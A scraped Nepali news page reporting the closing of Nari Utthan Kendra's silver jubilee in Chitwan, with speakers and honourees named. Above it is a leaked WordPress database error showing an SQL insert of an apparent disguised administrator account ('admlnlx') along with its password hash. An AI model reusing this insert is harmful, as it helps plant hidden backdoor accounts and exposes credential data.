WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjycmQ3cEh/.QeU7r640E4N5.t0Ids0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:16:58', '', 'admlnlx', 'admlnlx')
चितवन, माघ १६–
नारी उत्थान केन्द्र नारायणगढको रजत महोत्सव शनिबार सकिएको छ । गत साउन ३१ गतेबाट विभिन्न कार्यक्रमहरु गर्दै सुरु भएको रजत महोत्सवको शनिबार एक कार्यक्रम गरि समापन गरिएको हो ।
समापन कार्यक्रमकी प्रमुख अतिथि महिला अधिकारकर्मी तथा मानव बेचबिखनको क्षेत्रमा कार्यरत एबीसी नेपालकी अध्यक्ष दुर्गा घिमिरेले आर्थिक शशक्तिकरणले महिलाहरुको अवस्थामा परिवर्तन हुने बताउनुभयो । उहाँले अहिले पनि घरेलु हिंसामा कमी आउन नसकेको भन्दै महिला पुरुषको हातेमालोले समाजमा रहेको विभेदको अन्त्य हुने औंल्याउनुभयो ।
यसैगरि, कार्यक्रममा केन्द्रकी संस्थापक अध्यक्ष शान्ता श्रेष्ठ, पूर्व सांसद भीमबहादुर श्रेष्ठ, कृष्णकुमारी श्रेष्ठ, आदर्श विकास केन्द्रकी सरिता केसी, आदर्श गृहकी मीना खरेल, अधिवक्ता फुलमाया रानाभाट, केन्द्रका सल्लाहकार राजकुमार श्रेष्ठलगायतले समाज रुपान्तरणमा केन्द्रले उल्लेखनिय भुमिका खेलेको बताउनुभयो । सो अवसरमा कलाकारिता, कानुन, शिक्षा, पत्रकारिता लगायतका क्षेत्रमा योगदान दिएका चितवनका विभिन्न व्यक्तिहरुलाई सम्मान समेत गरिएको छ ।
केन्द्रकी अध्यक्ष पद्मा श्रेष्ठले स्वागत मन्तव्य व्यक्त गर्नुभएको कार्यक्रम रजत महोत्सव मुल समारोह समितिकी संयोजक तथा पूर्व अध्यक्ष दुर्गा लक्ष्मी श्रेष्ठको अध्यक्षतामा सम्पन्न भएको हो ।
वि.सं. २०४८ सालमा विधिवत रुपमा स्थापना भएको महिला नेतृत्वको संस्थाले सामाजिक क्षेत्रमा काम गर्दै महिला उद्यमशिलता विकास गर्दै आएको छ ।